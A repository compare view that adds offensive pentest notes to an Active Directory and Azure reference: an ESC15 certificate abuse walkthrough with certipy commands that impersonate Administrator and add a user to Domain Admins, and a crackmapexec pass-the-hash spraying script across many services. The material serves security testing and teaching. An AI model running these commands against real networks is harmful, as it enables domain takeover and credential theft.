swisskyrepo
/
InternalAllTheThings
mirror of https://github.com/swisskyrepo/InternalAllTheThings.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Compare commits

base: swisskyrepo:dce6446cb4e3c8df7f115406ca07655798fcf165
Branches Tags
swisskyrepo:gh-pages
swisskyrepo:main
...
compare: swisskyrepo:94921ca71e90daeab994fb58224d94ae58c9700b
Branches Tags
swisskyrepo:gh-pages
swisskyrepo:main

3 Commits
dce6446cb4 ... 94921ca71e

Author SHA1 Message Date
NoPurposeInLife 94921ca71e
Merge 2143a1a52e into 629e3f7c1e 2024-10-23 09:27:37 +01:00
Swissky 629e3f7c1e ESC15 + Azure Enumeration Tools 2024-10-21 22:41:13 +02:00
NoPurposeInLife 2143a1a52e
Update pwd-spraying.md 2024-07-25 21:49:15 +08:00
3 changed files with 83 additions and 6 deletions
Show Stats Expand all files Collapse all files

49
docs/active-directory/ad-adcs-certificate-services.md
View File

@ -423,6 +423,50 @@ Members : {}
```
## ESC15 - EKUwu Application Policies
**Requirements**
* **Template Schema Version 1**
* **ENROLLEE_SUPPLIES_SUBJECT** = True
**Exploitation**:
Detect the vulnerability from BloodHound data using the following cypher query.
```ps1
MATCH p=(:Base)-[:MemberOf*0..]->()-[:Enroll|AllExtendedRights]->(ct:CertTemplate)-[:PublishedTo]->(:EnterpriseCA)-[:TrustedForNTAuth]->(:NTAuthStore)-[:NTAuthStoreFor]->(:Domain) WHERE ct.enrolleesuppliessubject = True AND ct.authenticationenabled = False AND ct.requiresmanagerapproval = False AND ct.schemaversion = 1 RETURN p
```
The **Application Policies** extension is a proprietary certificate extension with the OID `1.3.6.1.4.1.311`, same as **x509 EKUs**. It was designed to allow users to specify additional use cases for certificates by utilizing the same OIDs as those in the Enhanced Key Usage extension.
If there is a conflict between an Application Policy and an EKU, then Microsoft prefers the proprietary Application Policy.
> "Application policy is Microsoft specific and is treated much like Extended Key Usage. If a certificate has an extension containing an application policy and also has an EKU extension, the EKU extension is ignored." - Microsoft
When a user requests a certificate based on a schema version 1 template and includes an application policy, the policy is incorporated into the certificate. This allows users to specify arbitrary EKUs, bypassing the requirements for ESC2.
**ESC1** - The WebServer template is enabled by default in ADCS, requires a user-supplied SAN and only has the `Server Authentication` EKU. Using [ly4k/Certipy PR #228](https://github.com/ly4k/Certipy/pull/228), we can add the `Client Authentication` EKU to `WebServer`. Anybody with the `Enroll` permission on this template can now compromise the domain.
```ps1
certipy req -dc-ip 10.10.10.10 -ca CA -target-ip 10.10.10.11 -u user@domain.com -p 'P@ssw0rd' -template WebServer -upn Administrator@domain.com --application-policies 'Client Authentication'
certipy auth -pfx administrator.pfx -dc-ip 10.10.10.10 -ldap-shell
# in LDAP shell
add_user pentest_user
add_user_to_group pentest_user "Domain Admins"
```
**ESC2/ESC3** - **Certificate Request Agent** (`1.3.6.1.4.1.311.20.2.1`),
```ps1
certipy -req -u user@domain.com -p 'P@ssw0rd' --application-policies "1.3.6.1.4.1.311.20.2.1" -ca "Lab Root CA" -template WebServer -dc-ip 10.10.10.10 -target-ip 10.10.10.11
certipy -req -u user@domain.com -p 'P@ssw0rd' -on-behalf-of DOMAIN\\Administrator -Template User -ca "Lab Root CA" -pfx user.pfx -dc-ip 10.10.10.10 -target-ip 10.10.10.11
certipy auth -pfx administrator.pfx -dc-ip 10.10.10.10
```
## Certifried CVE-2022-26923
> An authenticated user could manipulate attributes on computer accounts they own or manage, and acquire a certificate from Active Directory Certificate Services that would allow elevation of privilege.
@ -542,4 +586,7 @@ Using the **UnPAC The Hash** method, you can retrieve the NT Hash for an User vi
* [ADCS ESC14 Abuse Technique - Jonas Bülow Knudsen - 02/01/2024](https://posts.specterops.io/adcs-esc14-abuse-technique-333a004dc2b9)
* [ADCS Attack Paths in BloodHound — Part 2 - Jonas Bülow Knudsen - May 1, 2024](https://posts.specterops.io/adcs-attack-paths-in-bloodhound-part-2-ac7f925d1547)
* [ESC12 Shell access to ADCS CA with YubiHSM - hajo - October 2023](https://pkiblog.knobloch.info/esc12-shell-access-to-adcs-ca-with-yubihsm)
* [AD CS Domain Escalation - HackTricks](https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation#shell-access-to-adcs-ca-with-yubihsm-esc12)
* [AD CS Domain Escalation - HackTricks](https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation#shell-access-to-adcs-ca-with-yubihsm-esc12)
* [ESC15/EKUwu PR #228 - dru1d-foofus - 10/08/2024](https://github.com/ly4k/Certipy/pull/228)
* [EKUwu: Not just another AD CS ESC - Justin Bollinger - October 08, 2024](https://trustedsec.com/blog/ekuwu-not-just-another-ad-cs-esc)
* [ADCS Exploitation Part 2: Certificate Mapping + ESC15 - Giulio Pierantoni - Oct 10, 2024](https://medium.com/@offsecdeer/adcs-exploitation-series-part-2-certificate-mapping-esc15-6e19a6037760)

26
docs/active-directory/pwd-spraying.md
View File

@ -68,6 +68,30 @@ Using `kerbrute`, a tool to perform Kerberos pre-auth bruteforcing.
ncrack connection-limit 1 -vv --user administrator -P password-file.txt rdp://10.10.10.10
```
## Spray passwords against everything
* Using [crackmapexec](https://github.com/byt3bl33d3r/CrackMapExec)
```
> Take Administrator Password from mimikatz and secretsdump.py (Make sure you copy and save all the hash into hashes.txt)
proxychains4 -q -f /etc/proxychains_9052.conf python secretsdump.py -hashes :077a55c458dc4002dfdc5321a7659526 EXAMPLE.COM/Administrator@sql01.example.com
echo "" >> users.txt
echo "Administrator" >> users.txt
echo "Guest" >> users.txt
echo "DefaultAccount" >> users.txt
echo "WDAGUtilityAccount" >> users.txt
proxychains4 -q ./cme ssh --continue-on-success -u users.txt -H hashes.txt -d example.com targets.txt | grep "\[+\]"
proxychains4 -q ./cme smb --continue-on-success -u users.txt -H hashes.txt -d example.com targets.txt | grep "\[+\]"
proxychains4 -q ./cme winrm --continue-on-success -u users.txt -H hashes.txt -d example.com targets.txt | grep "\[+\]"
proxychains4 -q ./cme rdp --continue-on-success -u users.txt -H hashes.txt -d example.com targets.txt | grep "\[+\]"
proxychains4 -q ./cme mssql --continue-on-success -u users.txt -H hashes.txt -d example.com targets.txt | grep "\[+\]"
proxychains4 -q ./cme ldap --continue-on-success -u users.txt -H hashes.txt -d example.com targets.txt | grep "\[+\]"
proxychains4 -q ./cme ssh --continue-on-success -u users.txt -H hashes.txt --local-auth targets.txt | grep "\[+\]"
proxychains4 -q ./cme smb --continue-on-success -u users.txt -H hashes.txt --local-auth targets.txt | grep "\[+\]"
proxychains4 -q ./cme winrm --continue-on-success -u users.txt -H hashes.txt --local-auth targets.txt | grep "\[+\]"
proxychains4 -q ./cme rdp --continue-on-success -u users.txt -H hashes.txt --local-auth targets.txt | grep "\[+\]"
proxychains4 -q ./cme mssql --continue-on-success -u users.txt -H hashes.txt --local-auth targets.txt | grep "\[+\]"
proxychains4 -q ./cme ldap --continue-on-success -u users.txt -H hashes.txt --local-auth targets.txt | grep "\[+\]"
```
## BadPwdCount attribute
@ -77,4 +101,4 @@ Using `kerbrute`, a tool to perform Kerberos pre-auth bruteforcing.
$ netexec ldap 10.0.2.11 -u 'username' -p 'password' --kdcHost 10.0.2.11 --users
LDAP 10.0.2.11 389 dc01 Guest badpwdcount: 0 pwdLastSet: <never>
LDAP 10.0.2.11 389 dc01 krbtgt badpwdcount: 0 pwdLastSet: <never>
```
```

14
docs/cloud/azure/azure-enumeration.md
View File

@ -3,7 +3,7 @@
## Azure AD - Collectors
* [**Microsoft Portals**](https://msportals.io/) - Microsoft Administrator Sites
* [**ROADTool**](https://github.com/dirkjanm/ROADtools) - A collection of Azure AD tools for offensive and defensive security purposes
* [**dirkjanm/ROADTool**](https://github.com/dirkjanm/ROADtools) - A collection of Azure AD tools for offensive and defensive security purposes
```ps1
roadrecon auth --access-token eyJ0eXA...
roadrecon auth --prt-cookie <primary-refresh-token> -r msgraph -c "1950a258-227b-4e31-a9cf-717495945fc2"
@ -52,6 +52,12 @@
Get-Help Invoke-Monkey365 -Examples
Get-Help Invoke-Monkey365 -Detailed
```
* [**prowler-cloud/prowler**](https://github.com/prowler-cloud/prowler) - Prowler is an Open Source Security tool for AWS, Azure, GCP and Kubernetes to do security assessments, audits, incident response, compliance, continuous monitoring, hardening and forensics readiness. Includes CIS, NIST 800, NIST CSF, CISA, FedRAMP, PCI-DSS, GDPR, HIPAA, FFIEC, SOC2, GXP, Well-Architected Security, ENS and more
* [**projectdiscovery/nuclei-templates**](https://github.com/projectdiscovery/nuclei-templates/tree/main/cloud/azure) - Community curated list of templates for the nuclei engine to find security vulnerabilities.
```ps1
nuclei -t ~/nuclei-templates/cloud/azure/ -code -v
```
* [**nccgroup/ScoutSuite**](https://github.com/nccgroup/ScoutSuite) - Multi-Cloud Security Auditing Tool
* [**Flangvik/TeamFiltration**](https://github.com/Flangvik/TeamFiltration) - TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts
```ps1
TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --exfil --cookie-dump C:\\CookieData.txt --all
@ -66,10 +72,9 @@
```
* [**Azure/StormSpotter**](https://github.com/Azure/Stormspotter) - :warning: This repository has not been updated recently - Azure Red Team tool for graphing Azure and Azure Active Directory objects
* [**nccgroup/Azucar**](https://github.com/nccgroup/azucar.git) - :warning: This repository has been archived - Azucar automatically gathers a variety of configuration data and analyses all data relating to a particular subscription in order to determine security risks.
* [**FSecureLABS/Azurite Explorer**](https://github.com/FSecureLABS/Azurite) - :warning: This repository has not been updated recently - Enumeration and reconnaissance activities in the Microsoft Azure Cloud.
* [**FSecureLABS/Azurite**](https://github.com/FSecureLABS/Azurite) - :warning: This repository has not been updated recently - Enumeration and reconnaissance activities in the Microsoft Azure Cloud.
* [**cyberark/SkyArk**](https://github.com/cyberark/SkyArk) - :warning: This repository has not been updated recently - Discover the most privileged users in the scanned Azure environment - including the Azure Shadow Admins.
## Azure AD - User Enumeration
### Enumerate Tenant Informations
@ -222,4 +227,5 @@ Invoke-MFASweep -Username targetuser@targetdomain.com -Password Winter2020 -Reco
* [Bypassing conditional access by faking device compliance - @DrAzureAD - September 06, 2020](https://o365blog.com/post/mdm/)
* [CARTP-cheatsheet - Azure AD cheatsheet for the CARTP course](https://github.com/0xJs/CARTP-cheatsheet/blob/main/Authenticated-enumeration.md)
* [Attacking Azure/Azure AD and introducing Powerzure - SpecterOps - Ryan Hausknecht - Jan 28, 2020](https://posts.specterops.io/attacking-azure-azure-ad-and-introducing-powerzure-ca70b330511a)
* [Training - Attacking and Defending Azure Lab - Altered Security](https://www.alteredsecurity.com/azureadlab)
* [Training - Attacking and Defending Azure Lab - Altered Security](https://www.alteredsecurity.com/azureadlab)
* [Azure Config Review - Nuclei Templates v10.0.0 - Prince Chaddha - Sep 12, 2024](https://blog.projectdiscovery.io/azure-config-review-with-nuclei/)